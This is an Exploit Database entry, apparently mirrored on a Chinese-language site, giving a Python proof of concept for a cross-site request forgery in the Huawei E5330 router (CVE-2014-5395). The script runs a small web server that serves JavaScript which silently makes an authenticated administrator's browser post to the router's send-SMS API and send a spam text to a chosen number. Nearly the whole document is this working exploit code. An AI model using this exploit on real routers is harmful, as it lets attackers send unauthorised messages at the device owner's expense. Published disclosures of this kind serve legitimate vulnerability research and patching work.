Huawei E5330 21.210.09.00.158 – Cross-Site Request Forgery (Send SMS)

• Exploit Database
• 12 阅读

• 作者： Nathu Nandwani
  日期： 2019-01-07
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/46092/

• # Exploit Title: Huawei E5330 Cross-Site Request Forgery (Send SMS)
  # Date: 01/07/2019
  # Exploit Author: Nathu Nandwani
  # Website: http://nandtech.co/
  # Vendor Homepage: https://consumer.huawei.com/in/mobile-broadband/e5330/
  # Version: 21.210.09.00.158
  # Tested on: Windows 10 x64
  # CVE: CVE-2014-5395
  # Note: The administrator who opens the URL should be authenticated.
  import socket
  import time
   
  server_ip = "0.0.0.0"
  server_port = 80
   
  huawei_ip = "192.168.8.1"
  receiving_phone_no = "01234567890"
  sms_text = "This is a SPAM text from Huawei E5330"
  
  sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  sock.bind((server_ip, server_port))
  sock.listen(1)
   
  print "Currently listening at " + server_ip + ":" + str(server_port)
   
  client, (client_host, client_port) = sock.accept()
   
  print "Client connected: " + client_host + ":" + str(client_port)
  print ""
  print client.recv(1000)
   
  client.send('HTTP/1.0 200 OK\r\n')
  client.send('Content-Type: text/html\r\n')
  client.send('\r\n')
  
  client.send("""
  <html>
  <body>
  <script>
  var xhr = new XMLHttpRequest();
  xhr.open("POST", "http://""" + huawei_ip + """/api/sms/send-sms", true);
  xhr.send('<?xml version="1.0" encoding="UTF-8"?><request><Index>0</Index><Phones><Phone>""" + receiving_phone_no + """</Phone></Phones><Sca></Sca><Content>""" + sms_text+ """</Content><Length>""" + str(len(sms_text)) + """</Length><Reserved>1</Reserved><Date>""" + time.strftime('%Y-%m-%d %H:%M:%S') + """</Date></request>');
  </script>
  </body>
  </html>
  """)
   
  client.close()
  sock.close()